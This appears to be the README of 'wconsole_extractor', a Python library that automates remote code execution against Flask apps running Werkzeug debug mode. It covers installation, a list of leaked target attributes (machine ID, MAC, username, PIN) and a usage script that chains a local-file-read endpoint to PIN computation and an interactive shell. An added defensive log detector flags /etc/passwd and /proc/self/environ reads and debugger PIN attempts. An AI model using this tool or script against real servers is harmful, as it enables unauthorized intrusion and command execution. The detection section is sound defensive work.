Wconsole Extractor is a library that automatically exploits a Flask server running in debug mode. You only need to write a file leak function and pass it to the WConsoleExtractor class constructor; you can then access all the elements related to the debug mode. Moreover, you can call the shell function to obtain an interactive shell.
Global installation:
pip3 install wconsole-extractor
Python virtual environment:
python3 -m venv env
source env/bin/activate
pip3 install wconsole-extractor
# Deactivate environment
deactivate
Global installation (from source):
git clone https://github.com/Ruulian/wconsole_extractor.git
cd wconsole_extractor
pip3 install .
Python virtual environment (from source):
git clone https://github.com/Ruulian/wconsole_extractor.git
cd wconsole_extractor
python3 -m venv env
source env/bin/activate
pip3 install .
# Deactivate environment
deactivate
Note: The target operating system must be a Linux distribution.
To use the library correctly, you need an arbitrary file read on the target and must implement it in Python.
You must write a function that takes a filename as parameter and returns the content of the file on the target. If the file is not found, the function should return an empty string.
From a WConsoleExtractor instance, you can access multiple attributes:
# Target information
extractor.target # Specified target
extractor.base_url # Target base url
extractor.hostname # hostname
# Versions
extractor.python_version # Python version
extractor.werkzeug_version # Werkzeug version
# Probably public bits
extractor.username # User who launched the application
extractor.flask_path # Flask installation path
extractor.modname # Constant "flask.app"
extractor.class_name # Constant "Flask"
extractor.probably_public_bits # Probably public bits [username, modname, class_name, flask_path]
# Private bits
extractor.machine_id # Machine id
extractor.uuidnode # MAC address in decimal
extractor.private_bits # private bits
# Post process information
extractor.pin_code # Werkzeug PIN CODE
extractor.token # Werkzeug console token (available in HTML source code)
# Functions
extractor.shell() # Get interactive shell

from wconsole_extractor import WConsoleExtractor, info
import requests

def leak_function(filename) -> str:
    # Return the content of the file on the target, or "" if it is not found
    r = requests.get(f"http://localhost:5000/lfi?path={filename}")
    if r.status_code == 200:
        return r.text
    else:
        return ""

extractor = WConsoleExtractor(
    target="http://localhost:5000",
    leak_function=leak_function
)

info(f"PIN CODE: {extractor.pin_code}")
extractor.shell()
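
For defenders, the chain above (file read, then debugger access) leaves a recognizable trail in access logs. The following is an added example, not part of the wconsole_extractor project: it flags sources that both request system paths through a query parameter and send Werkzeug debugger requests (`__debugger__=yes`, `cmd=pinauth`). The log lines are constructed, and the signal names and function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the original page); IPs are documentation ranges.
SAMPLE_LOG = '''\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /lfi?path=/etc/passwd HTTP/1.1" 200 1204
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /lfi?path=%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /console?__debugger__=yes&cmd=pinauth&pin=000-000-000&s=PLACEHOLDER HTTP/1.1" 200 40
203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /lfi?path=report.txt HTTP/1.1" 200 90
203.0.113.9 - - [01/Jan/2024:10:01:03 +0000] "GET /static/app.css HTTP/1.1" 200 700
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')
# Matches absolute or traversal-style references to system directories.
SYSTEM_PATH_RE = re.compile(r'(?:^|/)(?:etc|proc|sys)/')

def classify(log_text):
    """Return {source_ip: set of signal names} for suspicious requests."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, _status = m.groups()
        params = parse_qs(urlsplit(target).query)  # parse_qs URL-decodes values
        signals = findings.setdefault(ip, set())
        if params.get("__debugger__") == ["yes"]:
            signals.add("debugger_request")
            if params.get("cmd") == ["pinauth"]:
                signals.add("pin_attempt")
        if any(SYSTEM_PATH_RE.search(v) for vals in params.values() for v in vals):
            signals.add("system_file_read")
    return {ip: s for ip, s in findings.items() if s}

def high_risk_sources(log_text):
    """Sources that both read system files and touched the debugger."""
    return sorted(ip for ip, s in classify(log_text).items()
                  if {"system_file_read", "debugger_request"} <= s)

if __name__ == "__main__":
    for ip, signals in classify(SAMPLE_LOG).items():
        print(ip, sorted(signals))
```

Any `debugger_request` hit on a production host means the application is running with debug mode enabled and should be treated as a finding on its own.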
👤 Ruulian
- Website: https://ruulian.me
- Twitter: @Ruulian_
Contributions, issues and feature requests are welcome!
Feel free to check issues page.
This project is MIT licensed.